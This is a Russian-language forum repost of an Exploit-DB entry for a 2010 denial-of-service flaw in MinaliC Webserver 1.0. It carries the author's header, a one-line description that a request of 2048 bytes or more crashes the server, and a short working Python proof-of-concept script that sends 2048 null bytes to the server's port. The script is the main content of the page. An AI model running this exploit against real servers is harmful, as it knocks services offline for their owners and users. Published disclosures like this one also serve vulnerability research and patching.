Exploit MinaliC WebServer 1.0 - Denial of Service

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
15334
Проверка EDB
  1. Пройдено
Автор
JOHN LEITCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2010-10-27
Код:
# ------------------------------------------------------------------------
# Software................MinaliC Webserver 1.0
# Vulnerability...........Denial Of Service
# Download................http://sourceforge.net/projects/minalic/
# Release Date............10/24/2010
# Tested On...............Windows XP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# [email protected]
# ------------------------------------------------------------------------
# 
# --Description--
# 
# Sending a request with a length greater than or equal to 2048 bytes
# causes the server to crash.
# 
# 
# --PoC--

import socket

host = 'localhost'
port = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('\x00'*2048)
 
Источник
www.exploit-db.com

Похожие темы